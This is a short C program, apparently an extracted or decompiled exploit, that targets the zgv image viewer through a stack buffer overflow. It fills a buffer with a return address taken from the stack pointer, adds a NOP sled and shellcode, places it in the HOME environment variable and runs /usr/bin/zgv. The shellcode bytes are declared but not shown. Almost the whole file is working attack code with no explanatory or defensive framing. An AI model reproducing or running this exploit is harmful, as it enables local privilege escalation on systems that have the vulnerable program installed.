
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 scalar_t__* buffer ;
 int bufsize ;
 int execl (char*,char*,int *) ;
 char* get_sp () ;
 int memcpy (scalar_t__*,int ,int ) ;
 int memset (scalar_t__*,int,int) ;
 int setenv (char*,scalar_t__*,int) ;
 int shellcode ;
 int strlen (int ) ;

main() {
  int i;

  for (i = 0; i < bufsize - 4; i += 4)
    *(char **)&buffer[i] = get_sp() -4675;

  memset(buffer, 0x90, 512);
  memcpy(&buffer[512], shellcode, strlen(shellcode));

  buffer[bufsize - 1] = 0;

  setenv("HOME", buffer, 1);

  execl("/usr/bin/zgv", "/usr/bin/zgv", ((void*)0));
}
